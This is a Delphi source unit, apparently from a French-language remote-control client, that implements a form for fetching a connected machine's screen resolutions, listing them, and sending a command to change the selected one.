(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untResolutions.pas                              ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Unit main of Resolutions form                 ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untResolutions;

interface

uses
  SysUtils, Classes, Controls, Forms, ComCtrls, Buttons;

type
  TfrmScreen = class(TForm)
    SpdRefreshScreen: TSpeedButton;
    LvwResolutions: TListView;
    SpdChangeScreen: TSpeedButton;
    procedure SpdRefreshScreenClick(Sender: TObject);
    procedure SpdChangeScreenClick(Sender: TObject);
    procedure FormCreate(Sender: TObject);
  private
    { Private declarations }
  public
    procedure ShowResolutions(Data:string);
  end;

var
  frmScreen: TfrmScreen;

implementation

uses untMain, untCommands;
{$R *.DFM}

procedure TfrmScreen.SpdRefreshScreenClick(Sender: TObject);
begin
   LvwResolutions.Items.Clear;
   frmMain.strStatus:='Rafraichir...';
   frmMain.SendCommand(COMMAND_GET_SCREEN,'');
end;

procedure TfrmScreen.SpdChangeScreenClick(Sender: TObject);
var
   LItem:TListItem;
begin
   if not frmMain.ClientMain.Active then
   begin
      frmMain.PutStatus('PAS connect..');
      Exit;
   end;
   LItem:=LvwResolutions.Selected;
   if LItem = nil then
   begin
      frmMain.PutStatus('Choisir d''abord une resolution...');
      Exit;
   end;
   frmMain.strStatus:='Changement en cour...';
   frmMain.SendCommand(COMMAND_SET_SCREEN,IntToStr(LItem.Index));
end;

procedure TfrmScreen.FormCreate(Sender: TObject);
begin
   Caption:='Resolution ';
   LvwResolutions.Columns.Items[0].Width:=Trunc(LvwResolutions.Width * 0.9);
end;

procedure TfrmScreen.ShowResolutions(Data:string);
var
   p:longint;
   This,f:string;
   NewItem:TListItem;
begin
   LvwResolutions.Items.Clear;
   f:=Chr(13);
   p:=Pos(f,Data);
   while p > 0 do
   begin
      This:=Copy(Data,1,p - 1);
      Data:=Copy(Data,p + 1,Length(Data));
      p:=Pos(f,Data);
      NewItem:=LvwResolutions.Items.Add;
      NewItem.Caption:=This;
   end;
   NewItem:=LvwResolutions.Items.Add;
   NewItem.Caption:=Data;
   frmMain.PutStatus('Resolutions recues...');
end;

end.
